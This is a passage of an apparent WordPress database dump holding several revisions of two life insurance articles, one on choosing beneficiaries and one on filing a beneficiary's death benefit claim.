information.</li>\r\n 	<li><strong>– Have a contingency plan.</strong>\r\nDetail how the death benefit should be divided if you have multiple beneficiaries, per the <a href=\"https://www.iii.org/article/what-beneficiary\" target=\"_blank\" rel=\"noopener noreferrer\">Insurance Information Institute</a>.</li>\r\n 	<li><strong>– Avoid designating a minor as a beneficiary.</strong>\r\nSome states don’t allow minors to receive the full amount of benefits from life insurance proceeds — or any proceeds at all. One way to avoid this is by setting up a trust for your child. Another option is setting up a Uniform Transfers to Minors Act (UTMA) account. Per <a href=\"https://secure.ssa.gov/poms.nsf/lnx/0501120205\" target=\"_blank\" rel=\"noopener noreferrer\">SI 01120.205</a>, under the UTMA, “any kind of property, real or personal, tangible or intangible, can be transferred to a custodian for the benefit of a minor.”</li>\r\n 	<li><strong>– Take divorce into consideration.</strong>\r\nDepending on your state, the designation of an ex-spouse as a beneficiary under your life insurance policy may be automatically revoked upon divorce.</li>\r\n</ul>\r\nThis is not a comprehensive list of considerations to make when choosing a life insurance beneficiary.\r\n<h3>Carefully consider who or what you would like your beneficiary to be.</h3>\r\nA beneficiary is the person, people, or entity to which a life insurance policy’s stated death benefit is paid, provided the insured’s death occurs during the policy’s coverage period, and the insured is up-to-date on premiums paid. There are primary and contingent beneficiaries.\r\n\r\nSome tips detailed above that may help you choose your life insurance beneficiary include:\r\n<ul>\r\n 	<li>Identify your priorities.</li>\r\n 	<li>Specify your beneficiary clearly.</li>\r\n 	<li>Keep your choices up-to-date.</li>\r\n 	<li>Have a contingency plan.</li>\r\n 	<li>Avoid designating a minor as a beneficiary.</li>\r\n 	<li>Take divorce into consideration.</li>\r\n</ul>\r\nConsult a licensed insurance professional in your state to find out more information about life insurance and how to select beneficiaries.\r\n\r\nRead the following for more information about life insurance beneficiaries:\r\n<ul>\r\n 	<li>“<a href=\"https://home.globelifeinsurance.com/articles/july-2021-resource-articles/what-to-expect-as-a-beneficiary-on-a-life-insuranc\" target=\"_blank\" rel=\"noopener noreferrer\">What to Expect as a Beneficiary on a Life Insurance Policy</a>”</li>\r\n 	<li>“<a href=\"https://home.globelifeinsurance.com/articles/september-2020-resource-articles/can-a-life-insurance-beneficiary-be-anyone\" target=\"_blank\" rel=\"noopener noreferrer\">Can a Life Insurance Beneficiary Be Anyone?</a>”</li>\r\n</ul>\r\n<h5><em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Insurance Information Institute, What is a beneficiary?, 2021, <a href=\"https://www.iii.org/article/what-beneficiary\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.iii.org/article/what-beneficiary</a></span></em></h5>','Tips For Choosing A Life Insurance Beneficiary','','inherit','closed','closed','','253-revision-v1','','','2023-03-13 13:41:46','2023-03-13 13:41:46','',253,'http://cmdev-site1.com/?p=255',0,'revision','',0),(402,3,'2023-03-19 17:45:13','2023-03-19 17:45:13','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nPurchasing a life insurance policy may help your family in the event of your passing. A life insurance policy can help by paying out benefits to those you’ve chosen as beneficiaries.\r\n\r\nThis article will help explain what a beneficiary is and provide some tips that may help you decide who or what to name as one.\r\n<h3>What is a beneficiary?</h3>\r\nA beneficiary is the person, people, or entity to which a life insurance policy’s death benefit is paid, provided:\r\n<ul>\r\n 	<li>– The insured’s death occurs during the policy’s coverage period and</li>\r\n 	<li>– The insured is up-to-date on premium payments</li>\r\n</ul>\r\n<h3>Who or what can be named a beneficiary?</h3>\r\nThe following can be named as a beneficiary:<sup>1</sup>\r\n<ul>\r\n 	<li>– One person</li>\r\n 	<li>– Two or more people</li>\r\n 	<li>– The trustee of a trust you’ve set up</li>\r\n 	<li>– A charity</li>\r\n 	<li>– Your estate</li>\r\n</ul>\r\n<h3>What are the different types of beneficiaries?</h3>\r\nThere are primary and contingent beneficiaries.\r\n<h3>Primary beneficiary</h3>\r\nThe primary beneficiary is the first to receive the death benefit payable in the amount and method outlined by the insured’s life insurance policy, provided they can be found after the insured’s death.<sup>1</sup>\r\n<h3>Contingent beneficiary</h3>\r\nA contingent beneficiary receives the death benefit payable in the amount and method outlined by the insured’s life insurance policy, provided the primary beneficiary can’t be found after the insured’s death.<sup>1</sup>\r\n<h3>Types of contingent beneficiaries</h3>\r\n<ul>\r\n 	<li>– Secondary beneficiary — The secondary beneficiary would benefit from the life insurance payout if the primary beneficiary died before the insured or could not be located.</li>\r\n 	<li>– Tertiary beneficiary — If the primary and secondary beneficiaries die before the insured or cannot be located, the tertiary (third) beneficiary would receive the funds.</li>\r\n</ul>\r\n<h3>What happens if I don’t choose a beneficiary?</h3>\r\nIf you do not select a beneficiary, or if all your beneficiaries pass away before you do, the benefit will be issued pursuant to the terms of the policy.\r\n\r\nIn most cases, the benefit will be payable to the Estate of the Insured or the Estate of the Owner. Then depending on the laws in your state, you may need to probate the estate in order for the probate judge to determine how and to whom the estate assets are to be distributed.\r\n\r\nThere is a possibility that your estate — including your life insurance policy’s death benefit — will be taxed and/or subject to executor’s fees if it enters into probate. Probate laws and associated fees vary by state.\r\n<h3>How to choose your life insurance beneficiary(s)</h3>\r\nYou may be considering having a primary, secondary, and even more contingent beneficiaries an important part of planning for you and your family’s future.\r\n\r\nHere are some tips that may help you choose your life insurance beneficiary:\r\n<ul>\r\n 	<li><strong>– Identify your priorities.</strong>\r\nAsk yourself who you currently support financially. Do you want them to continue to be provided for financially if you were to pass?\r\n<ul>\r\n 	<li>Family — You may want to ensure that your family’s support continues for expenses such as college, weddings, or to pay off your mortgage. Maybe you want to leave a legacy to your children or grandchildren, helping to set them up for financial independence in their futures.</li>\r\n 	<li>Charity — Depending on the laws in your state, you may be able to designate a charitable interest as a beneficiary to leave the proceeds of your policy to a worthy organization such as a charity, non-profit, or church.</li>\r\n</ul>\r\n</li>\r\n 	<li><strong>– Specify your beneficiary clearly.</strong>\r\nInclude your beneficiaries’ full legal names, relationship to the Insured, and percentage share of the Insured’s death benefit. This may help your life insurance company find them as quickly and easily as possible, which may help your beneficiary receive the life insurance death benefit in as timely and efficient a manner as possible.<sup>1</sup></li>\r\n 	<li><strong>– Keep your choices up-to-date.</strong>\r\nYou may choose a primary beneficiary who dies before you. If your primary beneficiary dies before you, don’t forget to update your choice of beneficiary. If your beneficiary’s address changes, update their contact information.</li>\r\n 	<li><strong>– Have a contingency plan.</strong>\r\nDetail how the death benefit should be divided if you have multiple beneficiaries, per the <a href=\"https://www.iii.org/article/what-beneficiary\" target=\"_blank\" rel=\"noopener noreferrer\">Insurance Information Institute</a>.</li>\r\n 	<li><strong>– Avoid designating a minor as a beneficiary.</strong>\r\nSome states don’t allow minors to receive the full amount of benefits from life insurance proceeds — or any proceeds at all. One way to avoid this is by setting up a trust for your child. Another option is setting up a Uniform Transfers to Minors Act (UTMA) account. Per <a href=\"https://secure.ssa.gov/poms.nsf/lnx/0501120205\" target=\"_blank\" rel=\"noopener noreferrer\">SI 01120.205</a>, under the UTMA, “any kind of property, real or personal, tangible or intangible, can be transferred to a custodian for the benefit of a minor.”</li>\r\n 	<li><strong>– Take divorce into consideration.</strong>\r\nDepending on your state, the designation of an ex-spouse as a beneficiary under your life insurance policy may be automatically revoked upon divorce.</li>\r\n</ul>\r\nThis is not a comprehensive list of considerations to make when choosing a life insurance beneficiary.\r\n<h3>Carefully consider who or what you would like your beneficiary to be.</h3>\r\nA beneficiary is the person, people, or entity to which a life insurance policy’s stated death benefit is paid, provided the insured’s death occurs during the policy’s coverage period, and the insured is up-to-date on premiums paid. There are primary and contingent beneficiaries.\r\n\r\nSome tips detailed above that may help you choose your life insurance beneficiary include:\r\n<ul>\r\n 	<li>Identify your priorities.</li>\r\n 	<li>Specify your beneficiary clearly.</li>\r\n 	<li>Keep your choices up-to-date.</li>\r\n 	<li>Have a contingency plan.</li>\r\n 	<li>Avoid designating a minor as a beneficiary.</li>\r\n 	<li>Take divorce into consideration.</li>\r\n</ul>\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n<h5><em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Insurance Information Institute, What is a beneficiary?, 2021, <a href=\"https://www.iii.org/article/what-beneficiary\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.iii.org/article/what-beneficiary</a></span></em></h5>','Tips For Choosing A Life Insurance Beneficiary','','inherit','closed','closed','','253-revision-v1','','','2023-03-19 17:45:13','2023-03-19 17:45:13','',253,'http://cmdev-site1.com/?p=402',0,'revision','',0),(256,3,'2023-03-13 14:26:24','2023-03-13 14:26:24','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','What To Expect As A Beneficiary On A Life Insurance Policy','','publish','open','open','','what-to-expect-as-a-beneficiary-on-a-life-insurance-policy','','','2023-03-19 17:45:42','2023-03-19 17:45:42','',0,'http://cmdev-site1.com/?p=256',0,'post','',0),(257,3,'2023-03-13 13:55:48','2023-03-13 13:55:48','The word or phrase Beneficiary in a dictionary','The word or phrase Beneficiary in a dictionary.','','inherit','open','closed','','the-word-or-phrase-beneficiary-in-a-dictionary','','','2023-03-13 13:56:02','2023-03-13 13:56:02','',256,'http://cmdev-site1.com/wp-content/uploads/2023/03/The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1.jpg',0,'attachment','image/jpeg',0),(265,3,'2023-03-13 14:02:01','2023-03-13 14:02:01','<h2>What is a beneficiary for a life insurance policy?</h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2>How do beneficiaries get a death benefit?</h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</blockquote>\r\n<h2>How do beneficiaries file a life insurance claim?</h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3>Death certificate:</h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3>Claim form:</h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3>Policy document:</h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div>\r\n<h2>You gathered your documents; now what?</h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div>In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div>Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div>\r\n<h2>Choose how you want to receive the death benefit.</h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3>Lump-sum:</h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3>Annuity:</h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:02:01','2023-03-13 14:02:01','',256,'http://cmdev-site1.com/?p=265',0,'revision','',0),(258,3,'2023-03-13 13:56:12','2023-03-13 13:56:12','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away. Often, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>\r\n<p class=\"article-break-quote\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</p>\r\n</blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div class=\"third-part\">\r\n<h2><strong>You gathered your documents; now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div class=\"third-part\">In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div class=\"third-part\">Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div class=\"third-part\">\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 13:56:12','2023-03-13 13:56:12','',256,'http://cmdev-site1.com/?p=258',0,'revision','',0),(260,3,'2023-03-13 13:57:53','2023-03-13 13:57:53','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>\r\n<h2 class=\"article-break-quote\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</h2>\r\n</blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div class=\"third-part\">\r\n<h2><strong>You gathered your documents; now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div class=\"third-part\">In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div class=\"third-part\">Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div class=\"third-part\">\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.</div>','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 13:57:53','2023-03-13 13:57:53','',256,'http://cmdev-site1.com/?p=260',0,'revision','',0),(259,3,'2023-03-13 13:57:03','2023-03-13 13:57:03','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote>\r\n<p class=\"article-break-quote\"><strong>Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</strong></p>\r\n</blockquote>\r\n<h2><strong>How do beneficiaries file a life insurance claim?</strong></h2>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company for the life insurance policy that was purchased.\r\n\r\nGenerally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud.\r\n\r\nTo receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document.\r\n\r\nIf you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<div class=\"third-part\">\r\n<h2><strong>You gathered your documents; now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.</div>\r\n<div></div>\r\n<div class=\"third-part\">In other words, the insurance company will review the information provided and make a determination on the claim.</div>\r\n<div></div>\r\n<div class=\"third-part\">Keep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n</div>\r\n<div class=\"third-part\">\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	